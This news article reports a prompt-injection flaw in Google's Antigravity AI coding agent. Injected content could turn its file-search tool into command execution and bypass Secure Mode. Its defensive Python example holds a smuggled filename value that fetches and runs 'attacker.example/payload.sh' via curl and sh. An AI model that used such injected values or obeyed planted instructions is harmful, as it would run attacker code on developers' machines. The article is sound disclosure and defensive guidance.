April 22, 2026 ChainGPT

Google Patches Antigravity Prompt-Injection RCE Bug — Crypto Devs Urged to Audit

Google has fixed a vulnerability in its Antigravity AI coding environment that, researchers say, could have allowed attackers to execute commands on a developer's machine through a prompt injection attack.

What happened

- The flaw lived in Antigravity's find_by_name file-search tool. Pillar Security, the cybersecurity firm that reported the issue, found the tool passed user input straight to an underlying command-line utility with no validation.
- That unchecked input could turn a simple file search into command execution, enabling remote code execution (RCE). Because Antigravity is allowed to create files, an attacker could stage a malicious script and then trigger it via the search tool, all without further user interaction once a prompt injection landed.
- In a proof of concept, Pillar Security researchers created a test script in a project workspace and triggered it through the search function; when executed, the script opened the computer's calculator app, demonstrating the search-to-execution path.

Timeline and response

- Antigravity, Google's AI-powered development environment launched last November, helps programmers write, test and manage code using autonomous agents.
- Pillar Security disclosed the vulnerability to Google on January 7. Google acknowledged the report the same day and marked the issue as fixed on February 28. Google did not immediately respond to Decrypt's request for comment.

Why it matters

- Prompt injection attacks embed hidden instructions in content so that an AI system performs unintended actions. Because developer tools routinely ingest external files and text, malicious inputs can be interpreted as legitimate commands, a critical risk when those tools can perform system-level actions.
- According to the report, the vulnerability also bypassed Antigravity's Secure Mode, the product's most restrictive security configuration.
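Pillar Security has not published Antigravity's actual code path, but the class of flaw it describes, unvalidated input interpolated into a shell command, can be sketched in a few lines of Python. All names here are illustrative, not Antigravity's implementation:

```python
def build_search_unsafe(pattern: str) -> str:
    # VULNERABLE pattern (illustration only): the search term is pasted
    # into a shell command string, so shell metacharacters in the input
    # become live syntax -- the class of flaw described in the report.
    return f'find . -name "{pattern}"'

def build_search_safe(pattern: str) -> list[str]:
    # Safer construction: arguments are passed as an argv list, so no
    # shell ever parses the input and the pattern stays a single
    # literal argument, metacharacters and all.
    return ["find", ".", "-name", pattern]

# A prompt-injected "file name" that smuggles in an extra command:
malicious = '"; curl attacker.example/payload.sh | sh; echo "'

print(build_search_unsafe(malicious))  # injected text lands inside a shell string
print(build_search_safe(malicious))    # injected text stays one argv entry
```

In the unsafe version, passing the built string to a shell would close the quoted argument and run the attacker's pipeline; in the list form, the same string is just an odd-looking filename pattern that matches nothing.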
Broader implications for the crypto and dev communities

- As AI agents gain more autonomy in development workflows, similar weaknesses could put source code, build environments, private keys and deployment pipelines at risk, a particular concern for crypto projects and wallets that depend on secure development chains.
- Pillar Security warned the industry to move beyond naive sanitization. "Every native tool parameter that reaches a shell command is a potential injection point," the firm wrote, urging execution isolation and rigorous auditing for agentic features.

Bottom line

The incident underscores that adding AI autonomy to development tools creates new attack surfaces. Crypto developers and teams using agentic coding environments should audit tool behaviors, limit native shell access where possible, and demand execution isolation from vendors shipping autonomous features.
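One way to act on that advice is to keep tool parameters away from any shell entirely. The hypothetical sketch below (the function name echoes the tool in the report, but the implementation is ours) does the name matching in-process, so a malicious pattern can at worst match unexpected files, never run commands:

```python
import fnmatch
import os

def find_by_name(root: str, pattern: str) -> list[str]:
    """Search for files under `root` whose names match `pattern`,
    without ever invoking a shell or external utility. Matching is
    done in-process with fnmatch, so the pattern is treated purely
    as data, not as command syntax."""
    matches = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            if fnmatch.fnmatch(name, pattern):
                matches.append(os.path.join(dirpath, name))
    return matches
```

A pattern like "; rm -rf /" simply fails to match any filename here, because no shell is present to interpret it.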